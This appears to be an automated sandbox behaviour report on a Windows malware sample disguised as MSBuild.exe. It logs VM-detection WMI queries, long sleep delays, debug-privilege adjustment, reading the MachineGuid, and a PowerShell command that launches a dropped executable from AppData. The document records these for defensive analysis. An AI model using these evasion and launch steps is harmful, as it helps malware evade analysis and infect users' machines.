Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Memory allocated: 1C255CF0000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Memory allocated: 1C26DE00000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 599828	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 599699	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 599594	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 599375	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 599266	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 599156	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 599044	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 598937	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 598718	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 598499	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 597718	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 597604	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 597378	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 597095	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 596858	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 595766	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 594636	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 594458	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 594196	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 594080	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 593953	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Window / User API: threadDelayed 2591	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Window / User API: threadDelayed 7118	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5315	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4269	Jump to behavior

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -599828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -599699s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -599594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -599484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -599375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -599266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -599156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -599044s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -598937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -598828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -598718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -598609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -598499s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -598391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -598266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -598156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -598047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -597937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -597828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -597718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -597604s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -597500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -597378s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -597095s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -596969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -596858s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -596750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -596641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -596422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -596312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -596094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -595984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -595875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -595766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -595641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -595516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -595297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -594969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -594750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -594636s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -594458s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -594196s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -594080s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe TID: 7544	Thread sleep time: -593953s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 599828	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 599699	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 599594	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 599375	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 599266	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 599156	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 599044	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 598937	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 598718	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 598499	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 597718	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 597604	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 597378	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 597095	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 596858	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 595766	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 594636	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 594458	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 594196	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 594080	Jump to behavior
Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Thread delayed: delay time: 593953	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: Amcache.hve.2.dr	Binary or memory string: VMware
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.2.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.2.dr	Binary or memory string: VMware, Inc.
Source: 1d0000.MSBuild.exe, 00000000.00000002.1529416669.000001C26E6A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.2.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.2.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 1d0000.MSBuild.exe	Binary or memory string: VMwareVBox.dllNONE
Source: Amcache.hve.2.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.2.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: vmci.sys
Source: 1d0000.MSBuild.exe, 00000000.00000002.1529276105.000001C26E653000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin`
Source: 1d0000.MSBuild.exe	Binary or memory string: vmware
Source: Amcache.hve.2.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.2.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.2.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.2.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.2.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.2.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.2.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 1d0000.MSBuild.exe, 00000000.00000002.1529276105.000001C26E653000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 1d0000.MSBuild.exe, 00000000.00000002.1527456610.000001C2544AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllLL
Source: Amcache.hve.2.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process 'C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe'"

Jump to behavior

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe	Queries volume information: C:\Users\user\Desktop\1d0000.MSBuild.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\1d0000.MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

